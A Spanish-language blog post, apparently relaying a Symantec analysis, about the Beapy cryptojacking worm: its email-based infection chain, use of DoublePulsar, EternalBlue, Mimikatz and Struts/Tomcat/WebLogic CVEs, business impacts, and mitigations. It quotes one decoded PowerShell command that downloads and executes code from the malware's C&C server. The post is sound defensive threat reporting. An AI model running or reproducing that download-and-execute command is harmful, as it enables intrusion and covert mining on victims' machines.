jueves, 9 de mayo de 2019

Beapy: Gusano de cryptojacking ataca a empresas en China



Beapy es una nueva campaña de cryptojacking que afecta a las empresas, la cual usa la vulneración EternalBlue y credenciales robadas y fijadas para propagarse rápidamente entre las redes. La actividad de Beapy fue observada por primera vez en telemetría de Symantec en enero de 2019. Esta actividad también se ha observado en servidores web y ha ido en aumento desde inicios de marzo.

Beapy (W32.Beapy) es un minador de monedas basado en archivos que usa el correo electrónico como vector de infección inicial. Esta campaña demuestra que mientras el cryptojacking ha bajado en popularidad entre los cibercriminales desde la cima de su popularidad a inicios de 2018, sigue teniendo atractivo para algunos de ellos, siendo ahora las empresas su blanco principal.

Casi todas las víctimas de Beapy son empresas (Figura 1). Beapy podría indicar la continuación de una tendencia demostrada por el gusano Bluwimps (MSH.Bluwimps) en 2018 y que mencionamos en el Reporte de las amenazas a la seguridad en Internet (Internet Security Threat Report o ISTR) 24: un mayor enfoque de los criminales del cryptojacking en las empresas. Aunque no tenemos evidencia de que estos ataques sean dirigidos, las habilidades de gusano de Beapy indican que probablemente siempre pretendió propagarse a través de las redes empresariales.

Esto refleja una tendencia de ransomware que también observamos durante 2018 cuando, a pesar de una caída de 20 por ciento en las infecciones generales de ransomware, en las empresas aumentó en un 12 por ciento. Los cibercriminales parecen enfocarse cada vez más en las empresas.

Beapy está afectando con mayor fuerza a las empresas en Asia, estando más del 80 por ciento de sus víctimas en China, con otras víctimas en Corea del Sur, Japón y Vietnam.



Cadena de infección

Los mensajes de correo electrónico maliciosos son el vector inicial de al menos algunas infecciones por Beapy. Un documento de Excel malicioso es enviado a las víctimas como archivo adjunto de correo electrónico. Si el receptor del mensaje de correo electrónico abre el archivo adjunto malicioso, la puerta trasera DoublePulsar (Backdoor.Doublepulsar) se descarga en la máquina víctima. DoublePulsar, al igual que EternalBlue, se filtró en el volcado Shadow Brokers y también se usó en el destructivo ataque de ransomware WannaCry en 2017. DoublePulsar abre una puerta trasera en las máquinas infectadas y permite la ejecución remota de código en las computadoras comprometidas. EternalBlue explota una vulnerabilidad en el protocolo SMB de Windows para permitir que los archivos se propaguen en forma lateral entre las redes.

Una vez que DoublePulsar se instala, un comando PowerShell se ejecuta, y el contacto se realiza con el servidor de comando y control (C&C) Beapy, antes de que un minador de monedas sea descargado en la computadora infectada. Si observamos el ejemplo de una máquina en telemetría de Symantec, vemos las primeras señales de actividad sospechosa el 15 de febrero de 2019, cuando se detecta la puerta trasera DoublePulsar. Después observamos que se lanza un comando PowerShell, el cual se decodifica en lo siguiente:

· IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)

Este es el dispositivo que contacta al servidor C&C Beapy. Algunos comandos PowerShell más son ejecutados y después se descarga un minador de monedas. Este proceso se repite conforme Beapy se propaga a otras computadoras en la red.

Al parecer, Beapy usa máquinas sin parches para arraigarse en la red y después usa EternalBlue para propagarse a otras máquinas. Sin embargo, EternalBlue no es la única técnica de propagación de Beapy, y también usa la herramienta roba-credenciales Hacktool.Mimikatz para tratar de recopilar las credenciales de las computadoras infectadas. Puede usarlas para propagarse incluso a máquinas con parches en la red. Beapy también usa una lista fijada de nombres de usuario y contraseñas para tratar de propagarse entre las redes. Esto es similar a como operaba el gusano Bluwimps. Los Bluwimps infectaron a miles de máquinas empresariales con minadores de monedas en 2017 y 2018.
Servidores web

Telemetría de Symantec también descubrió una versión anterior de Beapy en un servidor web público, con la cual el gusano trataba de propagarse a las computadoras conectadas al servidor. Una de las formas como parece hacer esto es generando una lista de direcciones IP que trata de infectar.

La versión de Beapy que se observa en el servidor web es una versión anterior del malware, codificada en C en vez de Python, como versiones posteriores. No obstante, la actividad es similar: el malware descargado también contiene módulos Mimikatz para cosechar credenciales, además de habilidades de vulneración EternalBlue.

Cuando comprometió al servidor web, Beapy también trató de explotar una vulnerabilidad de Apache Struts (CVE-2017-5638). Esta vulnerabilidad recibió un parche en 2017, pero si se explota con éxito, puede permitir la ejecución remota de código. Beapy también trató de explotar vulnerabilidades conocidas en Apache Tomcat (CVE-2017-12615) y el Servidor Oracle WebLogic (CVE-2017-10271). En el caso de este servidor web comprometido que observó Symantec, los intentos de explotación empezaron a principios de febrero, con conexiones al servidor C&C de Beapy observadas por primera vez el 13 de marzo. La actividad que atacaba a este servidor web continuó hasta principios de abril.

En general, la actividad de Beapy ha ido en aumento desde inicios de marzo.


¿Qué nos dice la actividad de Beapy?

A pesar de la fuerte disminución de la actividad del cryptojacking en 2018, cuando se dio una caída de 52 por ciento en el cryptojacking, esa sigue siendo un área de interés para los cibercriminales. Al observar los números generales del cryptojacking, podemos ver que hubo poco menos de 3 millones de intentos de cryptojacking en marzo de 2019. Aunque fue una gran caída desde la cima de febrero de 2018, cuando hubo 8 millones de intentos de cryptojacking, sigue siendo una cantidad importante.


Beapy es un minador de monedas basado en archivos, lo cual es interesante ya que la mayor parte de la actividad del cryptojacking que observamos en la cima de su popularidad se realizó usando minadores de monedas basados en navegadores, los cuales eran populares debido a barreras de entrada más bajas y porque permitían que incluso máquinas con todos sus parches pudieran ser atacadas. El anuncio de que el servicio de minado de monedas Coinhive, que fue lanzado en septiembre de 2017 y que jugó un papel clave en el crecimiento del cryptojacking, estaba cerrando probablemente también contribuyó a la caída en el cryptojacking basado en navegadores. El servicio, que hizo que fuera mucho más fácil que cualquiera llevara a cabo el minado de monedas basado en navegadores, cesó sus operaciones a inicios de marzo. El cierre de este servicio probablemente tendrá un impacto dramático en el cryptojacking basado en navegadores.

Además de estos factores, los minadores de monedas basados en archivos también tienen una ventaja significativa sobre los minadores basados en navegadores porque pueden minar las criptomonedas más rápidamente. La criptomoneda Monero, que es la que más comúnmente se mina durante los ataques de cryptojacking, bajó de valor en un 90 por ciento en 2018, por lo que podría tener sentido que los mineros que pueden crear más criptomonedas más rápidamente ahora son más populares con los cibercriminales.


Efectos del cryptojacking en las empresas
Aunque las empresas podrían pensar que no necesitan preocuparse por el cryptojacking tanto como por amenazas más disruptivas como el ransomware, aún podría tener un impacto mayor en las operaciones de la compañía.

Los impactos potenciales del cryptojacking para las empresas incluyen:

· Una disminución del desempeño de los dispositivos, potencialmente causando la frustración de los empleados y una reducción de la productividad

· Baterías que se sobrecalientan

· Dispositivos que se degradan y vuelven inutilizables, ocasionando costos más altos de TI

· Aumento en los costos debido a un mayor uso de la electricidad, y para las empresas que operan en la nube que son facturadas con base en el uso del CPU

Las empresas necesitan garantizar que sus redes estén protegidas contra toda la gama de amenazas de ciberseguridad.



Mitigación

· Haga énfasis en sistemas de defensa múltiples, que se superpongan y soporten mutuamente para protegerse contra fallas de puntos individuales en cualquier tecnología específica o método de protección. Esto incluye el despliegue de tecnologías de protección de terminales, correo electrónico y portales de red, además de firewalls y soluciones de evaluaciones de vulnerabilidad. Siempre mantenga actualizadas estas soluciones de seguridad con las más nuevas capacidades de protección.

· Eduque a cualquiera que use su dispositivo o red y pida encarecidamente que tenga precaución cuando vea mensajes de correo electrónico provenientes de fuentes no familiares y al abrir archivos adjuntos que no se hayan solicitado, los cuales podrían tener malware de minado de monedas basado en archivos.

· Eduque a los empleados sobre las señales que indican que su computadora podría tener un minador de monedas y deles la instrucción de informar de inmediato a TI si piensan que podría haber un minador de monedas en un dispositivo dentro de la red de la compañía.

· Monitoree el uso de la batería en su dispositivo y, si nota que hay un aumento sospechoso del uso, escanéelo para detectar la presencia de cualquier minero basado en archivos.

· Instale los últimos parches en sus dispositivos, use contraseñas seguras y habilite la autenticación de dos factores.

No hay comentarios.:

Publicar un comentario